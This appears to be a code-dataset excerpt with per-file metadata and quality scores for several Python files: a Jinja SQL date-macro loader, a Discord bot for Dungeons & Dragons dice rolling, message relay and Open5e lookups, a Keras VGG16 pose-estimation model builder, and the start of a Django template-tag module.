hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bf763a4c8d592b78137aeb2e05f05552f4b74818 | 2,415 | py | Python | squealy/jinjasql_loader.py | zeeshankhan28/squealy | 5dfe9c5830ef74978f5defc872500fb710097408 | [
"MIT"
] | null | null | null | squealy/jinjasql_loader.py | zeeshankhan28/squealy | 5dfe9c5830ef74978f5defc872500fb710097408 | [
"MIT"
] | null | null | null | squealy/jinjasql_loader.py | zeeshankhan28/squealy | 5dfe9c5830ef74978f5defc872500fb710097408 | [
"MIT"
] | 1 | 2022-03-20T18:24:50.000Z | 2022-03-20T18:24:50.000Z | import datetime
from jinja2 import DictLoader
from jinja2 import Environment
from jinjasql import JinjaSql
from dateutil.relativedelta import relativedelta
from dateutil import rrule
from squealy.exceptions import InvalidDateRangeException
def configure_jinjasql():
"""
Configure the environment and return jinjaSql object
"""
utils = """
{% macro date_range(day, range) -%}
{{day |safe}} between {{calculate_start_date(range)}} and {{get_today()}}
{%- endmacro %}
{% macro date_diff(start_date, end_date, parameter) -%}
{{ get_date_diff(start_date, end_date, parameter) }}
{%- endmacro %}
"""
loader = DictLoader({"utils.sql": utils})
env = Environment(loader=loader)
env.globals['get_date_diff'] = get_date_diff
env.globals['calculate_start_date'] = calculate_start_date
env.globals['get_today'] = get_today
return JinjaSql(env)
def get_date_diff(start_date, end_date, parameter):
"""
Returns the difference of month/days/week/years dependending on the parameter
"""
start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
end_date = datetime.datetime.strptime(end_date, '%Y-%m-%d')
diff_map = {
'days': len(list(rrule.rrule(rrule.DAILY, dtstart=start_date, until=end_date))),
'months': len(list(rrule.rrule(rrule.MONTHLY, dtstart=start_date, until=end_date))),
'years': len(list(rrule.rrule(rrule.YEARLY, dtstart=start_date, until=end_date))),
'weeks': len(list(rrule.rrule(rrule.WEEKLY, dtstart=start_date, until=end_date)))
}
return diff_map[parameter]
def calculate_start_date(range):
"""
Jinja filter to return start date based upon the range input and current date
"""
today = datetime.date.today()
start_date_mapping = {
"last_3_days": today + relativedelta(days=-2),
"last_week": today + relativedelta(days=-6),
"last_month": today + relativedelta(months=-1),
"last_quarter": today + relativedelta(months=-2),
"last_half": today + relativedelta(months=-5),
"last_year": today + relativedelta(years=-1)
}
start_date = start_date_mapping.get(range, None)
if not start_date:
raise InvalidDateRangeException("Invalid value for date_range macro in SQL query.")
return start_date
def get_today():
return datetime.date.today()
| 34.014085 | 92 | 0.677433 | 301 | 2,415 | 5.242525 | 0.292359 | 0.108365 | 0.045627 | 0.043093 | 0.193283 | 0.137516 | 0.06654 | 0.045627 | 0 | 0 | 0 | 0.004651 | 0.198758 | 2,415 | 70 | 93 | 34.5 | 0.810853 | 0.086128 | 0 | 0.041667 | 0 | 0 | 0.236465 | 0.035632 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.145833 | 0.020833 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf78dd1874f5270c579ee607ac544063c7bfd4b9 | 21,782 | py | Python | assistant/bot.py | jdcarpinelli/dungeons | fb644ba30e2bbd04d019ac279e27fdedfa1b0110 | [
"MIT"
] | 1 | 2021-02-11T02:50:11.000Z | 2021-02-11T02:50:11.000Z | assistant/bot.py | jdcarpinelli/dungeons | fb644ba30e2bbd04d019ac279e27fdedfa1b0110 | [
"MIT"
] | 1 | 2020-06-18T04:13:53.000Z | 2020-06-20T17:34:59.000Z | assistant/bot.py | jdcarpinelli/dungeons | fb644ba30e2bbd04d019ac279e27fdedfa1b0110 | [
"MIT"
] | null | null | null | ## Dungeons and Dragons Assistant
# Discord bot to handle...
# dice rolling,
# relaying messages,
# roll tracking,
# and (maybe) eventually more!
#
# Copied and modified code from:
# https://realpython.com/how-to-make-a-discord-bot-python/
#
##
# Imports
import sys, os, time, random, datetime
import discord
from discord.ext import commands
from dotenv import load_dotenv
import dice
# Imports from shadowedlucario/oghma:46128dc:bot.py
from query import *
import requests
import json
# Load token, server name from local file
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
GUILD = os.getenv('DISCORD_GUILD')
TOP_LEVEL_PATH = os.getenv('TOP_LEVEL_PATH')
AUTHOR = os.getenv('AUTHOR')
# Bot invalid command messages
INVALID_ROLL_CMD = \
'Whoops! The roll command wasn\'t used correctly.\n' \
'Try using the same format as the examples in "!help roll".'
INVALID_TELL_CMD = \
'Whoops! The tell command wasn\'t used correctly.\n' \
'Try using the same format as the examples in "!help tell".'
INVALID_TELL_MSG = \
'This command requires a non-blank message.'
INVALID_TELL_RECIPIENT = \
'The user you requested was not found in the server.'
INTERNAL_BUG = \
f'Congrats! That command you just sent resulted in an internal bug! ' \
f'Sorry about that, this was {AUTHOR}\'s first attempt at a Bot. ' \
f'Sending {AUTHOR} a DM with the command you sent would be really helpful!'
## Helper functions
# Returns timestampt string for log messages
def get_timestamp():
return str(int(time.time()*10e3))
# Create bot
bot = commands.Bot(command_prefix='!', disable_everyone=False)
# On startup
@bot.event
async def on_ready():
guild = discord.utils.get(bot.guilds, name=GUILD)
if guild is not None:
print('Connection with guild established!')
print(f'Bot username: {bot.user}')
print(f'Guild name: {guild.name}')
# On event error
@bot.event
async def on_error(event, *args, **kwargs):
with open(
TOP_LEVEL_PATH + '/assistant/logs/errors/err' + get_timestamp() + '.log',
'a'
) as f:
if event == 'on_message':
f.write(f'Unhandled message: {args[0]}\n')
else:
raise
# On command error
@bot.event
async def on_command_error(ctx, error):
# Print to stderr
print('\n\n' + INTERNAL_BUG + '\n\n')
# Log real error
with open(
TOP_LEVEL_PATH + '/assistant/logs/command_errors/err' + \
get_timestamp() + '.log',
'a'
) as err_file:
err_file.write(
f'Author: {ctx.author}\n\n'
f'Message Metadata: {ctx.message}\n\n'
f'Error: {str(error)}'
)
print('Error logged to ', err_file.name)
await ctx.send(INTERNAL_BUG)
# Print intro message
@bot.command(
name='intro',
help='Responds with Dnd-Assistant Introduction.'
)
async def intro(ctx, *args):
# Ignore any arguments
embed = discord.Embed(
title='Hello, meet DnD-Assistant!',
description= \
f'The primary feature is rolling dice, '
f'but more features will be added soon. '
f'Let {AUTHOR} know if you have any '
f'features you want added!\n\n'
f'You can run DnD-Assistant\'s commands '
f'by typing "!" immediately followed by '
f'the command. For example, to list all '
f'possible commands, enter "!help". To '
f'get help with a particular command, like '
f'the "roll" command, enter "!help roll". '
f'Finally, to roll three 6-sided die, enter '
f'"!roll 3d6".\n\n'
f'If you\'re interested, you can check out '
f'the source code at https://github.com/cadojo/dungeons.',
color=0x000000)
# Roll command
embed.add_field(
name='Command: roll',
value= \
'Rolls 4, 6, 8, 10, 12, or 20 sided die.\n'
'Usage: !roll 20, !roll 3d6, !r 2d20, etc.',
inline=False
)
# Help command
embed.add_field(
name='Command: help',
value= \
'List all possible DnD-Assistant commands, or '
'get help with one specific command.\n'
'Usage: !help, or !help roll, !help r, !help intro, etc.',
inline=False
)
# Intro command
embed.add_field(
name='Command: intro',
value= \
'Print out this introduction!\n'
'Usage: !intro',
inline=False
)
await ctx.send(embed=embed)
# Roll dice
@bot.command(
name='roll',
aliases=['r'],
help='Rolls 4, 6, 8, 10, 12, or 20 sided die.\n\n'
'Examples:\n'
'Roll a single 20-sided die:\t\t!roll 20\n'
'Roll three 6-sided die:\t\t\t!roll 3d6\n'
'"!r" serves as a shortcut for "!roll:\t!r 20\n')
async def roll(ctx, *args):
success, msg = dice.roll_request(args)
if success:
await ctx.send('Roll returned: ' + str(msg))
else:
await ctx.send(INVALID_ROLL_CMD + '\n' + str(msg))
# Relay a message
@bot.command(
name = 'tell',
help = \
f'Relay a message to someone else on this server.\n\n'
f'Examples:\n'
f'Tell {AUTHOR} have a great day: !tell @jodoca have a great day!'
)
async def tell(ctx, recipient: str, *message):
## Argument checking
# Usage:
# !tell @user message without any quotes
guild = discord.utils.get(bot.guilds, name=GUILD)
if guild is None:
await ctx.send(INTERNAL_BUG)
return
## Argument checking
# Re-construct message
msg = ''
for m in message:
msg += m + ' '
# Recipient and message should not be empty
if '@' not in recipient \
or recipient == '' \
or msg == '':
await ctx.send(INVALID_TELL_CMD + '\n' + INVALID_TELL_MSG)
# Check if recipient is @everyone or a user
all_recipients = []
if recipient == '@everyone':
all_recipients = [user for user in guild.members if user != bot.user]
else:
# Remove special characters, left with id or name
recipient_parsed = recipient\
.replace('@','')\
.replace('<','')\
.replace('>','')\
.replace('!','')
for user in [user for user in guild.members if user != bot.user]:
if (recipient_parsed == user.name) \
or (recipient_parsed == str(user.id)):
all_recipients.append(user)
if len(all_recipients) == 0:
await ctx.send(INVALID_TELL_RECIPIENT)
return
## Context checking
# If command in DM, DM recipient
if ctx.message.channel.type == discord.ChannelType.private:
for user in all_recipients:
await user.send('<@!' + str(ctx.author.id) + '> says: ' + msg)
await ctx.send('Sent!')
return
# Otherwise, just post wherever this was posted
else:
recipient_str = ''
for user in all_recipients:
recipient_str += ('<@!' + str(user.id) + '> ')
await ctx.send(
f'Hey {recipient_str}, {ctx.author.name} says: {msg}'
)
return
### Bot commands from shadowedlucario/oghma
###
# FUNC NAME: ?search [ENTITY]
# FUNC DESC: Queries the Open5e search API, basically searches the whole thing for the ENTITY.
# ENTITY: The DND entity you wish to get infomation on.
# FUNC TYPE: Command
###
@bot.command(
name='search',
help='Queries the Open5e API to get the entities infomation.',
usage='?search [ENTITY]',
aliases=["sea", "s", "S"]
)
async def search(ctx, *args):
print(f"Executing: ?search {args}")
# Import & reset globals
global partialMatch
partialMatch = False
# Verify arg length isn't over limits
if len(args) >= 201:
argumentsEmbed = discord.Embed(
color=discord.Colour.red(),
title="Invalid argument length",
description="This command does not support more than 200 words in a single message. Try splitting up your query."
)
argumentsEmbed.set_thumbnail(url="https://i.imgur.com/j3OoT8F.png")
return await ctx.send(embed=argumentsEmbed)
# Send directory contents if no search term given
if len(args) <= 0:
await ctx.send(embed=discord.Embed(
color=discord.Colour.blue(),
title="Searching...",
description="This might take a few seconds!"
))
# Get objects from directory, store in txt file
directoryRequest = requests.get("https://api.open5e.com/search/?format=json&limit=10000")
if directoryRequest.status_code != 200:
return await ctx.send(embed=codeError(
directoryRequest.status_code,
"https://api.open5e.com/search/?format=json&limit=10000"
)
)
# Generate a unique filename and write to it
entityFileName = generateFileName("entsearch")
entityFile = open(entityFileName, "a+")
for entity in directoryRequest.json()["results"]:
if "title" in entity.keys():
entityFile.write(f"{ entity['title'] }\n")
else:
entityFile.write(f"{ entity['name'] }\n")
entityFile.close()
# Send embed notifying start of the spam stream
detailsEmbed = discord.Embed(
colour=discord.Colour.orange(),
title=f"See `{ entityFileName }` for all searchable entities in this endpoint",
description="Due to discord charecter limits regarding embeds, the results have to be sent in a file. Yes I know this is far from ideal but it's the best I can do!"
)
detailsEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
await ctx.send(embed=detailsEmbed)
# Send entites file
return await ctx.send(file=discord.File(entityFileName))
# Filter input to remove whitespaces and set lowercase
filteredInput = "".join(args).lower()
# Search API
await ctx.send(embed=discord.Embed(
color=discord.Colour.blue(),
title=f"Searching for { filteredInput }...",
description="This might take a few seconds!"
))
# Use first word to narrow search results down for quicker response on some directories
match = requestOpen5e(f"https://api.open5e.com/search/?format=json&limit=10000&text={ str(args[0]) }", filteredInput, True)
# An API Request failed
if isinstance(match, dict) and "code" in match.keys():
return await ctx.send(embed=codeError(match["code"], match["query"]))
# Searching algorithm hit an invalid object
elif match == "UNKNOWN":
unknownMatchEmbed = discord.Embed(
colour=discord.Colour.red(),
title="ERROR",
description="I found an entity in the API database that doesn't contain a `name` or `docuement` attribute. Please report this to https://github.com/shadowedlucario/oghma/issues"
)
unknownMatchEmbed.set_thumbnail(url="https://i.imgur.com/j3OoT8F.png")
return await ctx.send(embed=unknownMatchEmbed)
# No entity was found
elif match == None:
noMatchEmbed = discord.Embed(
colour=discord.Colour.orange(),
title="ERROR",
description=f"No matches found for **{ filteredInput }** in the search endpoint"
)
noMatchEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
return await ctx.send(embed=noMatchEmbed)
# Otherwise, construct & send responses
else:
responses = constructResponse(args, match["route"], match["matchedObj"])
for response in responses:
if isinstance(response, discord.Embed):
# Set a thumbnail for relevent embeds and on successful Scyfall request, overwriting all other thumbnail setup
image = requestScryfall(args, False)
if (not isinstance(image, int)): response.set_thumbnail(url=image)
# Note partial match in footer of embed
if partialMatch:
response.set_footer(text=f"NOTE: Your search term ({ filteredInput }) was a PARTIAL match to this entity.\nIf this isn't the entity you were expecting, try refining your search term or use ?searchdir instead")
else:
response.set_footer(text="NOTE: If this isn't the entity you were expecting, try refining your search term or use `?searchdir` instead")
print(f"SENDING EMBED: { response.title }...")
await ctx.send(embed=response)
elif ".txt" in response:
print(f"SENDING FILE: { response }...")
await ctx.send(file=discord.File(response))
###
# FUNC NAME: ?searchdir [RESOURCE] [ENTITY]
# FUNC DESC: Queries the Open5e RESOURCE API.
# RESOURCE: Resource name (i.e. spells, monsters, etc.).
# ENTITY: The DND entity you wish to get infomation on.
# FUNC TYPE: Command
###
@bot.command(
name='searchdir',
help='Queries the Open5e API to get the entities infomation from the specified resource.',
usage='!search [RESOURCE] [ENTITY]',
aliases=["dir", "d", "D"]
)
async def searchdir(ctx, *args):
print(f"EXECUTING: ?searchdir {args}")
# Import & reset globals
global partialMatch
partialMatch = False
# Get API Root
rootRequest = requests.get("https://api.open5e.com?format=json")
# Throw if Root request wasn't successfull
if rootRequest.status_code != 200:
return await ctx.send(embed=codeError(rootRequest.status_code, "https://api.open5e.com?format=json"))
# Remove search endpoint from list (not used in this command)
directories = list(rootRequest.json().keys())
directories.remove("search")
# Verify we have arguments
if len(args) <= 0:
usageEmbed = discord.Embed(
colour=discord.Colour.red(),
title="No directory was requested.\nUSAGE: `?searchdir [DIRECTORY] [D&D OBJECT]`",
description=f"**Available Directories**\n{ ', '.join(directories) }"
)
usageEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
return await ctx.send(embed=usageEmbed)
# Filter the dictionary input
filteredDictionary = f"{ args[0].lower() }/"
# Filter input to remove whitespaces and set lowercase
filteredInput = "".join(args[1:]).lower()
# Verify arg length isn't over limits
if len(args) >= 201:
argumentsEmbed = discord.Embed(
color=discord.Colour.red(),
title="Invalid argument length",
description="This command does not support more than 200 words in a single message. Try splitting up your query."
)
argumentsEmbed.set_thumbnail(url="https://i.imgur.com/j3OoT8F.png")
return await ctx.send(embed=argumentsEmbed)
# Verify resource exists
if directories.count(args[0]) <= 0:
noResourceEmbed = discord.Embed(
colour=discord.Colour.orange(),
title=f"Requested Directory (`{ str(args[0]) }`) is not a valid directory name",
description=f"**Available Directories**\n{ ', '.join(directories) }"
)
noResourceEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
return await ctx.send(embed=noResourceEmbed)
# Send directory contents if no search term given
if len(args) == 1:
await ctx.send(embed=discord.Embed(
color=discord.Colour.blue(),
title=f"Searching for everything having to do this { filteredDictionary.upper() }!!",
description="Sit back, this might take a minute."
))
# Get objects from directory, store in txt file
directoryRequest = requests.get(f"https://api.open5e.com/{ filteredDictionary }?format=json&limit=10000")
if directoryRequest.status_code != 200:
return await ctx.send(embed=codeError(
directoryRequest.status_code,
f"https://api.open5e.com/{ filteredDictionary }?format=json&limit=10000"
)
)
entityNames = []
for entity in directoryRequest.json()["results"]:
if "title" in entity.keys(): entityNames.append(entity['title'])
else: entityNames.append(entity['name'])
# Keep description word count low to account for names with lots of charecters
if len(entityNames) <= 200:
detailsEmbed = discord.Embed(
colour=discord.Colour.orange(),
title="All searchable entities in this endpoint",
description="\n".join(entityNames)
)
detailsEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
if "search" in filteredDictionary:
detailsEmbed.set_footer(text="NOTE: The `search` endpoint is not searchable with `?searchdir`. Use `?search` instead for this.")
return await ctx.send(embed=detailsEmbed)
# Generate a unique filename and write to it
entityDirFileName = generateFileName("entsearchdir")
entityFile = open(entityDirFileName, "a+")
entityFile.write("\n".join(entityNames))
entityFile.close()
# Send embed notifying start of the spam stream
detailsEmbed = discord.Embed(
colour=discord.Colour.orange(),
title=f"See `{ entityDirFileName }` for all searchable entities in this endpoint",
description="Due to discord charecter limits regarding embeds, the results have to be sent in a file. Yes I know this is far from ideal but it's the best I can do!"
)
detailsEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
if "search" in filteredDictionary:
detailsEmbed.set_footer(text="NOTE: The `search` endpoint is not searchable with `?searchdir`. Use `?search` instead for this.")
await ctx.send(embed=detailsEmbed)
# Send entites file
return await ctx.send(file=discord.File(entityDirFileName))
# search/ endpoint is best used with the dedicated ?search command
if "search" in filteredDictionary:
# Remove search endpoint from list
directories = list(rootRequest.json().keys())
directories.remove("search")
searchEmbed = discord.Embed(
colour=discord.Colour.orange(),
title=f"Requested Directory (`{ str(args[0]) }`) is not a valid directory name",
description=f"**Available Directories**\n{ ', '.join(directories) }"
)
searchEmbed.add_field(name="NOTE", value="Use `?search` for searching the `search/` directory. This has been done to cut down on parsing errors.")
searchEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
return await ctx.send(embed=searchEmbed)
# Search API
await ctx.send(embed=discord.Embed(
color=discord.Colour.blue(),
title=f"Searching all { filteredDictionary.upper() } for { filteredInput }...",
description="This might take a few seconds!"
))
# Determine filter type (search can only be used for some endpoints)
filterType = "text"
if args[0] in searchParamEndpoints: filterType = "search"
# Use first word to narrow search results down for quicker response on some directories
match = requestOpen5e(
f"https://api.open5e.com/{ filteredDictionary }?format=json&limit=10000&{ filterType }={ str(args[1]) }",
filteredInput,
False
)
# An API Request failed
if isinstance(match, dict) and "code" in match.keys():
return await ctx.send(embed=codeError(match.code, match.query))
# Searching algorithm hit an invalid object
elif match == "UNKNOWN":
unknownMatchEmbed = discord.Embed(
colour=discord.Colour.red(),
title="ERROR",
description="I found an entity in the API database that doesn't contain a `name` or `docuement` attribute. Please report this to https://github.com/shadowedlucario/oghma/issues"
)
unknownMatchEmbed.set_thumbnail(url="https://i.imgur.com/j3OoT8F.png")
return await ctx.send(embed=unknownMatchEmbed)
# No entity was found
elif match == None:
noMatchEmbed = discord.Embed(
colour=discord.Colour.orange(),
title="ERROR",
description=f"No matches found for **{ filteredInput.upper() }** in the { filteredDictionary } endpoint"
)
noMatchEmbed.set_thumbnail(url="https://i.imgur.com/obEXyeX.png")
return await ctx.send(embed=noMatchEmbed)
# Otherwise, construct & send responses
else:
responses = constructResponse(args, filteredDictionary, match)
for response in responses:
if isinstance(response, discord.Embed):
# Set a thumbnail for relevent embeds and on successful Scyfall request, overwrites other thumbnail setup
image = requestScryfall(args, True)
if (not isinstance(image, int)): response.set_thumbnail(url=image)
# Note partial match in footer of embed
if partialMatch:
response.set_footer(text=f"NOTE: Your search term ({ filteredInput }) was a PARTIAL match to this entity.\nIf this isn't the entity you were expecting, try refining your search term")
print(f"SENDING EMBED: { response.title }...")
await ctx.send(embed=response)
elif ".txt" in response:
print(f"SENDING FILE: { response }...")
await ctx.send(file=discord.File(response))
if __name__ == '__main__':
bot.run(TOKEN)
| 35.533442 | 229 | 0.622441 | 2,679 | 21,782 | 5.025009 | 0.178798 | 0.021394 | 0.03209 | 0.030308 | 0.608825 | 0.584683 | 0.557941 | 0.536547 | 0.5104 | 0.492869 | 0 | 0.008871 | 0.265081 | 21,782 | 612 | 230 | 35.591503 | 0.832084 | 0.145533 | 0 | 0.405063 | 0 | 0.01519 | 0.334144 | 0.011353 | 0 | 0 | 0.000432 | 0 | 0 | 1 | 0.002532 | false | 0 | 0.020253 | 0.002532 | 0.078481 | 0.027848 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf78e11629d9199d5d649ba8cfe17400cd17fd79 | 3,217 | py | Python | Custom_Functions/Model_Generator.py | knownstranger03/Human_Pose_Estimation | fad4b171ffc6514918990b5f48e439ca7f5b3184 | [
"MIT"
] | null | null | null | Custom_Functions/Model_Generator.py | knownstranger03/Human_Pose_Estimation | fad4b171ffc6514918990b5f48e439ca7f5b3184 | [
"MIT"
] | null | null | null | Custom_Functions/Model_Generator.py | knownstranger03/Human_Pose_Estimation | fad4b171ffc6514918990b5f48e439ca7f5b3184 | [
"MIT"
] | null | null | null | import keras
import tensorflow
from keras.applications.vgg16 import VGG16
from keras.engine.sequential import Sequential
from keras.layers import Flatten, Dense, Dropout, BatchNormalization, InputLayer, Conv2D, MaxPool2D, Activation, Concatenate,add
from keras.models import Model
import warnings
warnings.filterwarnings('ignore')
#Define a function that returns final model
def run():
#Download the VGG16 base model
conv_base = VGG16(weights= 'imagenet', include_top= False, input_shape= (224,224,3))
#changing the base model layer to non-trainable, to keep the previous trained layers in tact
for layer in conv_base.layers:
layer.trainable= False
#Creating additional architecture
def top_model():
top_model = Sequential()
top_model.add(Conv2D(64,(3,3), activation='relu', padding = 'same',
input_shape=conv_base.output_shape[1:]))
top_model.add(BatchNormalization())
top_model.add(MaxPool2D(pool_size=(2,2), strides=(1,1)))
top_model.add(Flatten())
top_model.add(Dense(4096, activation='relu'))
top_model.add(BatchNormalization())
top_model.add(Dropout(0.5))
top_model.add(Dense(14//ns, activation='relu')) #for ns =2 it will be 14//2 == 7
# Creating a final model based on VGG16 and additional architecture
model = Sequential()
for layer in conv_base.layers:
model.add(layer)
model.add(top_model)
return model
def create_model(n):
outputs=[]
for i in range(1,n+1):
globals()[f'model_{i}'] = top_model()
outputs.append(globals()[f'model_{i}'].output)
merged= add(outputs)
output= Dense(14, activation='relu', kernel_initializer= 'Ones')(merged)
final_model = Model(inputs= conv_base.input, output= output)
return final_model
ns=2
model = create_model(ns)
#Save a copy and freshly import the model
model.save('../Custom_Models/Keras_Model_H5/Untrained_Model.h5')
print("Model is saved to '/Untrained_Model.h5'")
import tensorflow
model=tensorflow.keras.models.load_model('../Custom_Models/Keras_Model_H5/Untrained_Model.h5')
return(model) #Returns the model directly to current instance
def run2():
#Building a Deep Neural Network based classification model
model=Sequential()
model.add(Dense(164, input_shape=[14], activation= 'relu', kernel_regularizer='l2', kernel_initializer='TruncatedNormal'))
model.add(Dense(164, activation='relu'))
model.add(Dense(546*2, activation='relu'))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(14, activation= 'relu', kernel_regularizer='l2'))
model.add(BatchNormalization())
model.add(Dense(2, activation= 'sigmoid'))
#Save a copy of the untrained model
model.save('../Custom_Models/Keras_Model_H5/Untrained_Classification_Model.h5')
print("Model is saved to '/Untrained_Classification_Model.h5'")
import tensorflow
model=tensorflow.keras.models.load_model('../Custom_Models/Keras_Model_H5/Untrained_Classification_Model.h5')
return model | 45.957143 | 128 | 0.685421 | 417 | 3,217 | 5.153477 | 0.290168 | 0.067008 | 0.040949 | 0.040949 | 0.327594 | 0.272685 | 0.217776 | 0.180549 | 0.147976 | 0.084691 | 0 | 0.030338 | 0.200808 | 3,217 | 70 | 129 | 45.957143 | 0.805523 | 0.145477 | 0 | 0.220339 | 0 | 0 | 0.15365 | 0.104745 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067797 | false | 0 | 0.152542 | 0 | 0.271186 | 0.033898 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf79ad59a70ac719097fc73bb371a6c0bcb6f953 | 1,719 | py | Python | rndt/templatetags/metadata_tags.py | pasing/geonode-rndt | 214a0d17d4b93ae22257550d209c27cad4885692 | [
"BSD-2-Clause"
] | null | null | null | rndt/templatetags/metadata_tags.py | pasing/geonode-rndt | 214a0d17d4b93ae22257550d209c27cad4885692 | [
"BSD-2-Clause"
] | 56 | 2021-01-19T10:06:06.000Z | 2021-09-10T15:31:47.000Z | rndt/templatetags/metadata_tags.py | pasing/geonode-rndt | 214a0d17d4b93ae22257550d209c27cad4885692 | [
"BSD-2-Clause"
] | 1 | 2022-03-20T11:18:01.000Z | 2022-03-20T11:18:01.000Z | from django import template
from django.core.validators import URLValidator
from geonode.base.models import Thesaurus, ThesaurusKeyword
from rndt.models import LayerRNDT
register = template.Library()
@register.filter
def get_thesaurus_about(thesaurus_id):
